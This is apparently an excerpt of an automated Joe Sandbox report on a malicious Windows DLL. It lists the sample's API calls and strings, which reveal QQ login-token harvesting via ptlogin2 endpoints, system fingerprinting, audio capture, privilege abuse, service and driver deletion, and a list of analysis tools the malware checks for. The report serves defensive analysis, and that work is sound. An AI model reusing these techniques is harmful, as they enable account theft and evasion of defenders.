                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CopyModuleName
                                                  • String ID:
                                                  • API String ID: 4108865673-0
                                                  • Opcode ID: 8b9eeeda643a368c08ce189f1b931563e6753a19753fcbcbb6e14da0ee54dd1c
                                                  • Instruction ID: 93f4a3cd88c2ae214515ddcb3b57ab60d0dfeb708720a14bb37e431ebb366a02
                                                  • Opcode Fuzzy Hash: 8b9eeeda643a368c08ce189f1b931563e6753a19753fcbcbb6e14da0ee54dd1c
                                                  • Instruction Fuzzy Hash: BCE012F95443006BF314DB58DCC6FE636A8BB80B00FC44918F79C851D0E6F59598C662

                                                  Control-flow Graph
                                                  control_flow_graph 187 10014c12-10014c27 RegCloseKey * 2
                                                  APIs
                                                  • RegCloseKey.ADVAPI32(00000000,100149B7), ref: 10014C1C
                                                  • RegCloseKey.ADVAPI32(?), ref: 10014C25
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Close
                                                  • String ID:
                                                  • API String ID: 3535843008-0
                                                  • Opcode ID: 2d25b05425eaf0d76969a3d827c9af328c302ad55e3d4ae73cc7dce2a4c3e829
                                                  • Instruction ID: cb428774d1c23af65b3502e581b01568c295d1083760601ce9be51a3606d3d50
                                                  • Opcode Fuzzy Hash: 2d25b05425eaf0d76969a3d827c9af328c302ad55e3d4ae73cc7dce2a4c3e829
                                                  • Instruction Fuzzy Hash: 8BB09B759240389BDF54DB64DC449C937687B48200B050586B51CA3150C931AD808F90
                                                  APIs
                                                  • LocalAlloc.KERNEL32(00000040,00000400), ref: 1000A591
                                                  • LoadLibraryA.KERNEL32 ref: 1000A5A9
                                                  • GetProcAddress.KERNEL32(00000000,AllocateAndGetTcpExTableFromStack), ref: 1000A5C1
                                                  • GetProcAddress.KERNEL32(00000000,AllocateAndGetUdpExTableFromStack), ref: 1000A5CB
                                                  • GetProcAddress.KERNEL32(00000000,InternalGetTcpTable2), ref: 1000A5E7
                                                  • GetProcessHeap.KERNEL32(00000001), ref: 1000A602
                                                  • GetProcessHeap.KERNEL32(00000002,00000002), ref: 1000AD8C
                                                  • GetProcessHeap.KERNEL32(00000002,00000002), ref: 1000ADAD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressHeapProcProcess$AllocLibraryLoadLocal
                                                  • String ID: %s:%u$*.*.*.*:*$AllocateAndGetTcpExTableFromStack$AllocateAndGetUdpExTableFromStack$CLOSE_WAIT$FIN_WAIT1$FIN_WAIT2$InternalGetTcpTable2$InternalGetUdpTableWithOwnerPid$LAST_ACK$TIME_WAIT$[TCP]$[UDP]$iphlpapi.dll$Wu
                                                  • API String ID: 370057222-2536726367
                                                  • Opcode ID: 519bc66bccf35325d0b58bf220eed18991c6d328836e432961e0ea9d9299cabc
                                                  • Instruction ID: 3878becebeafeda62e551408519d1494f05c47cd3e4fb1777d1cfee609c89dcd
                                                  • Opcode Fuzzy Hash: 519bc66bccf35325d0b58bf220eed18991c6d328836e432961e0ea9d9299cabc
                                                  • Instruction Fuzzy Hash: 53A2C1766083159FC324CF28CC449ABB7E5FBC9710F554A2DF94A93281DA74ED0ACB92
                                                  APIs
                                                  • RegOpenKeyExA.ADVAPI32 ref: 1002A387
                                                  • RegQueryValueExA.ADVAPI32(?,~MHz,00000000,00000000,?,?), ref: 1002A3B6
                                                  • RegCloseKey.ADVAPI32(?), ref: 1002A3C1
                                                  • GetSystemInfo.KERNEL32(?), ref: 1002A3CF
                                                  • wsprintfA.USER32 ref: 1002A3F8
                                                  • RegOpenKeyExA.ADVAPI32(80000002,00000043,00000000,00000001,?), ref: 1002A551
                                                  • RegQueryValueExA.ADVAPI32(00000001,ProcessorNameString,00000000,?,?,00000043), ref: 1002A59F
                                                  • RegCloseKey.ADVAPI32(?), ref: 1002A5EF
                                                  • GetComputerNameA.KERNEL32(?,secorPlartneC), ref: 1002A645
                                                    • Part of subcall function 1002A180: WTSQuerySessionInformationA.WTSAPI32(00000000,000000FF,00000005,?,?,?,76C08400,?), ref: 1002A19F
                                                    • Part of subcall function 1002A180: WTSFreeMemory.WTSAPI32(?,00000000,000000FF,00000005,?,?,?,76C08400,?), ref: 1002A1D0
                                                  • GetTickCount.KERNEL32 ref: 1002A65B
                                                  • wsprintfA.USER32 ref: 1002A6AB
                                                  • GetDC.USER32(00000000), ref: 1002A6B2
                                                  • GetDeviceCaps.GDI32(00000000,00000075), ref: 1002A6C3
                                                  • GetDeviceCaps.GDI32(00000000,00000076), ref: 1002A6C9
                                                  • wsprintfA.USER32 ref: 1002A6D9
                                                  • ReleaseDC.USER32(00000000,00000000), ref: 1002A6E1
                                                  • wsprintfA.USER32 ref: 1002A705
                                                  • wsprintfA.USER32 ref: 1002A727
                                                  • wsprintfA.USER32 ref: 1002A740
                                                  • GetCommandLineA.KERNEL32 ref: 1002A745
                                                  • wsprintfA.USER32 ref: 1002A759
                                                  • GetUserNameA.ADVAPI32(?,?), ref: 1002A773
                                                  • wsprintfA.USER32 ref: 1002A807
                                                  • wsprintfA.USER32 ref: 1002A81F
                                                  • FindWindowA.USER32(?,00000000), ref: 1002A869
                                                  • GetWindowTextA.USER32(00000000,?,00000104), ref: 1002A8CA
                                                  • GetWindow.USER32(00000000,00000002), ref: 1002A9AA
                                                  • GetClassNameA.USER32(00000000,?,00000104), ref: 1002A9BC
                                                  • GlobalMemoryStatusEx.KERNEL32(?), ref: 1002A9DD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wsprintf$NameQueryWindow$CapsCloseDeviceMemoryOpenValue$ClassCommandComputerCountFindFreeGlobalInfoInformationLineReleaseSessionStatusSystemTextTickUser
                                                  • String ID: %d * %d$%d*%dMHz$%s%s%s$0$A$A$A$A$C$C$C$C$CTXOPConntion_Class$D$D$D$D$E$E$E$E$H$H$I$I$I$I$N$N$O$O$P$P$P$P$ProcessorNameString$R$R$R$R$R$R$S$S$S$S$T$T$W$W$a$a$c$c$e$e$e$e$e$e$l$l$m$m$n$n$o$o$o$r$r$r$r$r$s$s$s$s$secorPlartneC$t$t$t$t$y$y$~MHz
                                                  • API String ID: 2087514681-3067132264
                                                  • Opcode ID: c3aafca63d4541a4f23b0196fe3412c2bd167dc5efb1c85bbde7835129de271a
                                                  • Instruction ID: 58d400f4b91c49924f4ea43f818cc88c4a31776bace7832dff8664dd12829245
                                                  • Opcode Fuzzy Hash: c3aafca63d4541a4f23b0196fe3412c2bd167dc5efb1c85bbde7835129de271a
                                                  • Instruction Fuzzy Hash: 7722D13050C7C19EE325C638C854B9BBFD6ABD2304F484A5DF6D947282DBBA9908C767
                                                  APIs
                                                  • InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 1001410A
                                                  • InternetConnectA.WININET(00000000,00000000,000001BB,00000000,00000000,00000003,00000000,00000000), ref: 1001413A
                                                  • InternetCloseHandle.WININET(00000000), ref: 1001414B
                                                  Strings
                                                  • Accept: */*Referer: https://xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=715030901&daid=73&hide_close_icon=1&pt_no_auth=1&s_url=http%3A%2F%2Fqun.qq.com%2Fmember.html%23Accept-Language: zh-cnContent-Type: application/x-www-form-urlencoded, xrefs: 100140CB
                                                  • pt_local_token=, xrefs: 10014280
                                                  • xui.ptlogin2.qq.com, xrefs: 100140A2
                                                  • /cgi-bin/xlogin?appid=715030901&daid=73&hide_close_icon=1&pt_no_auth=1&s_url=http%3A%2F%2Fqun.qq.com%2Fmember.html%23, xrefs: 100140B4
                                                  • Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1), xrefs: 10014082
                                                  • groups, xrefs: 100146D3
                                                  • HTTP/1.1, xrefs: 10014170, 10014410
                                                  • 0.9475416028552021, xrefs: 100143E7
                                                  • localhost.ptlogin2.qq.com, xrefs: 100140E0
                                                  • , xrefs: 10014100
                                                  • uin, xrefs: 10014658
                                                  • Accept: */*Referer: https://localhost.ptlogin2.qq.com:4301%sAccept-Language: zh-cnContent-Type: application/x-www-form-urlencodedCookie: %s, xrefs: 10014456
                                                  • Set-Cookie: , xrefs: 1001430E, 1001435F
                                                  • nickname, xrefs: 1001464D
                                                  • pt_local_tk=, xrefs: 100142B5
                                                  • /pt_get_uins?callback=ptui_getuins_CB&r=%s&%s, xrefs: 100143F3
                                                  • friends, xrefs: 100146B1
                                                  • GET, xrefs: 10014176, 10014416
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Internet$CloseConnectHandleOpen
                                                  • String ID: $/cgi-bin/xlogin?appid=715030901&daid=73&hide_close_icon=1&pt_no_auth=1&s_url=http%3A%2F%2Fqun.qq.com%2Fmember.html%23$/pt_get_uins?callback=ptui_getuins_CB&r=%s&%s$0.9475416028552021$Accept: */*Referer: https://localhost.ptlogin2.qq.com:4301%sAccept-Language: zh-cnContent-Type: application/x-www-form-urlencodedCookie: %s$Accept: */*Referer: https://xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=715030901&daid=73&hide_close_icon=1&pt_no_auth=1&s_url=http%3A%2F%2Fqun.qq.com%2Fmember.html%23Accept-Language: zh-cnContent-Type: application/x-www-form-urlencoded$GET$HTTP/1.1$Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)$Set-Cookie: $friends$groups$localhost.ptlogin2.qq.com$nickname$pt_local_tk=$pt_local_token=$uin$xui.ptlogin2.qq.com
                                                  • API String ID: 1463438336-3428588184
                                                  • Opcode ID: d5fce840208fc55bd6649f1f1c9febec2897434e5a5b3cd0b33532438a929aca
                                                  • Instruction ID: 10a0a4d67c7a86b0295143d81d79a2071c775b89c22be300c5b0aaeb6ee9b044
                                                  • Opcode Fuzzy Hash: d5fce840208fc55bd6649f1f1c9febec2897434e5a5b3cd0b33532438a929aca
                                                  • Instruction Fuzzy Hash: C20249766047047BE310DA68DC45FEF73D9EBC4720F450A29FA05E7280EF79E90586A6
                                                  APIs
                                                    • Part of subcall function 1001B660: GetModuleHandleA.KERNEL32(?,755683C0,1001F1D6), ref: 1001B666
                                                    • Part of subcall function 1001B660: LoadLibraryA.KERNEL32(?), ref: 1001B671
                                                    • Part of subcall function 1001B660: GetProcAddress.KERNEL32(00000000,?), ref: 1001B681
                                                  • GetVersionExA.KERNEL32(?), ref: 1001E264
                                                    • Part of subcall function 1001AC50: LoadLibraryW.KERNEL32(ntdll.dll,?,00000000,1001B2AF,?,?,?), ref: 1001AC59
                                                    • Part of subcall function 1001AC50: GetProcAddress.KERNEL32(00000000,RtlGetNtVersionNumbers), ref: 1001AC6B
                                                    • Part of subcall function 1001AC50: FreeLibrary.KERNEL32(00000000), ref: 1001AC95
                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1001E292
                                                  • sprintf.MSVCRT ref: 1001E2AD
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1001E31B
                                                  • CloseHandle.KERNEL32(00000000), ref: 1001E34D
                                                  • FindWindowA.USER32(#32770,GINA Logon), ref: 1001E377
                                                  • FindWindowA.USER32(#32770,1011F8E4), ref: 1001E391
                                                  • Sleep.KERNEL32(0000012C), ref: 1001E3A1
                                                  • FindWindowA.USER32(#32770,GINA Logon), ref: 1001E3AD
                                                  • CloseHandle.KERNEL32(00000000), ref: 1001E414
                                                  • ExitProcess.KERNEL32 ref: 1001E433
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FindHandleLibraryWindow$AddressCloseLoadModuleProc$ExitFileFreeNameObjectProcessSingleSleepVersionWaitsprintf
                                                  • String ID: #32770$%s -acsi$-rsvc$-wait$.$.$2$2$3$3$A$A$A$A$C$C$D$E$E$E$GINA Logon$H$I$K$L$P$S$S$V$a$a$a$c$c$d$d$d$i$i$l$l$l$l$l$l$n$n$r$r$r$r$r$r$s$s$t$t$t$t$t$t$u$v$v$v$x
                                                  • API String ID: 2386940797-994141675
                                                  APIs
                                                  • AttachConsole.KERNEL32(?), ref: 100101B3
                                                  • Sleep.KERNEL32(0000000A), ref: 100101BB
                                                  • AttachConsole.KERNEL32(?), ref: 100101C5
                                                  • GetConsoleProcessList.KERNEL32(?,00000001), ref: 100101D8
                                                  • #823.MFC42(00000000), ref: 100101E9
                                                  • GetConsoleProcessList.KERNEL32(00000000,00000000), ref: 100101F9
                                                  • GetCurrentProcessId.KERNEL32 ref: 10010203
                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 10010217
                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 10010226
                                                  • CloseHandle.KERNEL32(00000000), ref: 1001022D
                                                  • #825.MFC42(00000000), ref: 1001023E
                                                  • FreeConsole.KERNEL32 ref: 1001024C
                                                  • Sleep.KERNEL32(0000000A), ref: 10010254
                                                  • FreeConsole.KERNEL32 ref: 1001025A
                                                  • TerminateProcess.KERNEL32(?,00000000), ref: 10010266
                                                  • swprintf.MSVCRT(?,\Registry\Machine\System\CurrentControlSet\Services\%S,1011F4B8,NTDLL.DLL,ZwUnloadDriver,NTDLL.DLL,RtlInitUnicodeString,SeLoadDriverPrivilege,00000001), ref: 10010304
                                                  • SHDeleteKeyA.SHLWAPI(80000002,?), ref: 1001039A
                                                  • OpenSCManagerA.ADVAPI32(00000000,00000000,00000001), ref: 100103A6
                                                  • OpenServiceA.ADVAPI32(00000000,1011EC82,00010000), ref: 100103BD
                                                  • DeleteService.ADVAPI32(00000000), ref: 100103D0
                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 100103D7
                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 100103DA
                                                  • GetSystemDirectoryA.KERNEL32 ref: 1001049F
                                                  • lstrcatA.KERNEL32(?,?), ref: 100104B4
                                                  • DeleteFileA.KERNEL32(?), ref: 100104C4
                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 10010509
                                                  • lstrcatA.KERNEL32(?,?), ref: 10010518
                                                  • DeleteFileA.KERNEL32(?), ref: 10010522
                                                  • LocalFree.KERNEL32(?), ref: 1001052A
                                                  • free.MSVCRT ref: 1001053D
                                                  • free.MSVCRT ref: 10010546
                                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 1001055D
                                                  • GetCurrentProcess.KERNEL32(00000000), ref: 10010568
                                                  • IsWow64Process.KERNEL32(00000000), ref: 1001056F
                                                  • DeleteFileA.KERNEL32(?), ref: 1001060E
                                                  • SetServiceStatus.ADVAPI32(?,1012BB40), ref: 1001062D
                                                  • ExitProcess.KERNEL32 ref: 1001063A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$Console$DeleteService$CloseDirectoryFileFreeHandleOpen$AttachCurrentListSleepSystemTerminatefreelstrcat$#823#825ExitLocalManagerStatusWindowsWow64swprintf
                                                  • String ID: .$.$.sys$Host$MarkTime$NTDLL.DLL$P$RtlInitUnicodeString$SYSTEM\CurrentControlSet\Services\$SYSTEM\CurrentControlSet\Services\BITS$SYSTEM\Select$SYSTEM\Setup$SeLoadDriverPrivilege$V$ZwUnloadDriver$\$\$\Registry\Machine\System\CurrentControlSet\Services\%S$\sysnative\drivers\$\system32\drivers\$a$b$d$d$d$e$g$g$m$n$o$o$s$t$u
                                                  • API String ID: 2905031204-766513331
                                                  APIs
                                                    • Part of subcall function 1001B690: GetCurrentProcess.KERNEL32(00000028,00000000,00000001,?,?), ref: 1001B69A
                                                    • Part of subcall function 1001B690: OpenProcessToken.ADVAPI32(00000000), ref: 1001B6A1
                                                  • LocalAlloc.KERNEL32(00000040,00000104), ref: 10019960
                                                  • OpenSCManagerA.ADVAPI32 ref: 10019977
                                                  • EnumServicesStatusA.ADVAPI32(00000000,00000030,00000003,00000000,?,?,?,?), ref: 100199A3
                                                  • LocalAlloc.KERNEL32(00000040,?), ref: 100199AC
                                                  • EnumServicesStatusA.ADVAPI32(00000000,00000030,00000003,00000000,?,?,?,?), ref: 100199CE
                                                  • OpenServiceA.ADVAPI32(00000000,?,00000001), ref: 100199F4
                                                  • QueryServiceConfigA.ADVAPI32(00000000,00000000,00000000,?), ref: 10019A1A
                                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 10019A27
                                                  • QueryServiceConfigA.ADVAPI32(00000000,00000000,00000000,00000000), ref: 10019A3B
                                                  • QueryServiceConfig2A.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 10019A55
                                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 10019A62
                                                  • QueryServiceConfig2A.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 10019A7A
                                                  • lstrcatA.KERNEL32(?,100FBD1C), ref: 10019ADB
                                                  • lstrcatA.KERNEL32(?,100FBD14), ref: 10019B06
                                                  • lstrlenA.KERNEL32(00000040), ref: 10019B1C
                                                  • lstrlenA.KERNEL32(?), ref: 10019B24
                                                  • lstrlenA.KERNEL32 ref: 10019B2F
                                                  • lstrlenA.KERNEL32(?), ref: 10019B3B
                                                  • lstrlenA.KERNEL32(?), ref: 10019B44
                                                  • lstrlenA.KERNEL32(?), ref: 10019B4C
                                                  • LocalSize.KERNEL32(?), ref: 10019B5E
                                                  • LocalReAlloc.KERNEL32(?,00000000,00000042), ref: 10019B70
                                                  • lstrlenA.KERNEL32(?), ref: 10019B7E
                                                  • lstrlenA.KERNEL32(?), ref: 10019B88
                                                  • lstrlenA.KERNEL32(?), ref: 10019BB1
                                                  • lstrlenA.KERNEL32(00000000), ref: 10019BC6
                                                  • lstrlenA.KERNEL32 ref: 10019BCF
                                                  • lstrlenA.KERNEL32(00000000), ref: 10019BFA
                                                  • lstrlenA.KERNEL32 ref: 10019C0B
                                                  • lstrlenA.KERNEL32(00000000), ref: 10019C14
                                                  • lstrlenA.KERNEL32(00000001), ref: 10019C3A
                                                  • lstrlenA.KERNEL32(?), ref: 10019C49
                                                  • lstrlenA.KERNEL32(?), ref: 10019C6B
                                                  • lstrlenA.KERNEL32(?), ref: 10019C81
                                                  • lstrlenA.KERNEL32(?), ref: 10019CA9
                                                  • lstrlenA.KERNEL32(?), ref: 10019CBB
                                                  • lstrlenA.KERNEL32(?), ref: 10019CC5
                                                  • lstrlenA.KERNEL32(?), ref: 10019CE9
                                                  • LocalFree.KERNEL32(?), ref: 10019CFE
                                                  • LocalFree.KERNEL32(00000000), ref: 10019D01
                                                  • CloseServiceHandle.ADVAPI32(?), ref: 10019D08
                                                  • LocalFree.KERNEL32(00000000), ref: 10019D3B
                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 10019D42
                                                  • LocalReAlloc.KERNEL32(00000000,?,00000042), ref: 10019D50
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrlen$Local$Service$Alloc$Query$FreeOpen$CloseConfigConfig2EnumHandleProcessServicesStatuslstrcat$CurrentManagerSizeToken
                                                  • String ID: SeDebugPrivilege
                                                  • API String ID: 19575313-2896544425
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,TerminateThread), ref: 1000115F
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10001168
                                                  • LoadLibraryA.KERNEL32 ref: 100011B4
                                                  • GetProcAddress.KERNEL32(00000000), ref: 100011B7
                                                  • LoadLibraryA.KERNEL32(WINMM.dll,waveOutClose), ref: 100011C7
                                                  • GetProcAddress.KERNEL32(00000000), ref: 100011CA
                                                  • LoadLibraryA.KERNEL32(WINMM.dll,waveInStop), ref: 100011DA
                                                  • GetProcAddress.KERNEL32(00000000), ref: 100011DD
                                                  • LoadLibraryA.KERNEL32(WINMM.dll,waveInReset), ref: 100011ED
                                                  • GetProcAddress.KERNEL32(00000000), ref: 100011F0
                                                  • LoadLibraryA.KERNEL32(WINMM.dll,waveInUnprepareHeader), ref: 10001200
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10001203
                                                  • LoadLibraryA.KERNEL32(WINMM.dll,waveInClose), ref: 10001211
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10001214
                                                  • LoadLibraryA.KERNEL32(WINMM.dll,waveOutReset), ref: 10001224
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10001227
                                                  • LoadLibraryA.KERNEL32(WINMM.dll,waveOutUnprepareHeader), ref: 10001237
                                                  • GetProcAddress.KERNEL32(00000000), ref: 1000123A
                                                  • #825.MFC42(?), ref: 100012C4
                                                  • #825.MFC42(00000000,?), ref: 100012CC
                                                  • #825.MFC42(?,00000000,?), ref: 100012D5
                                                  • #825.MFC42(?,?,00000000,?), ref: 100012DE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc$#825
                                                  • String ID: C$H$KERNEL32.dll$TerminateThread$WINMM.dll$a$d$n$o$s$waveInClose$waveInReset$waveInStop$waveInUnprepareHeader$waveOutClose$waveOutReset$waveOutUnprepareHeader
                                                  • API String ID: 345516743-2415744366
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: strstr$Window$IconicTextVisible
                                                  • String ID: ApateDNS$Capsa$CurrPorts$Fiddler$Malwarebytes$Metascan$Port$Process$Sniff$TCPEye$TaskExplorer$Wireshark
                                                  • API String ID: 4234658395-3439171801
                                                  APIs
                                                  • GetVersionExA.KERNEL32 ref: 1001B28C
                                                    • Part of subcall function 1001AC50: LoadLibraryW.KERNEL32(ntdll.dll,?,00000000,1001B2AF,?,?,?), ref: 1001AC59
                                                    • Part of subcall function 1001AC50: GetProcAddress.KERNEL32(00000000,RtlGetNtVersionNumbers), ref: 1001AC6B
                                                    • Part of subcall function 1001AC50: FreeLibrary.KERNEL32(00000000), ref: 1001AC95
                                                    • Part of subcall function 1001A8F0: lstrlenA.KERNEL32(?,?,?,?,?,?,00000000,755723A0), ref: 1001A98A
                                                    • Part of subcall function 1001A8F0: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,?,00000000,755723A0), ref: 1001A9C4
                                                    • Part of subcall function 1001A8F0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,00000000,755723A0), ref: 1001A9D4
                                                    • Part of subcall function 1001A8F0: ReadFile.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,?,00000000,755723A0), ref: 1001A9E4
                                                    • Part of subcall function 1001A8F0: CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,755723A0), ref: 1001A9EB
                                                    • Part of subcall function 1001A8F0: lstrlenA.KERNEL32(?,?,?,?,?,?,00000000,755723A0), ref: 1001A9F8
                                                    • Part of subcall function 1001A8F0: gethostname.WS2_32(?,?), ref: 1001AA00
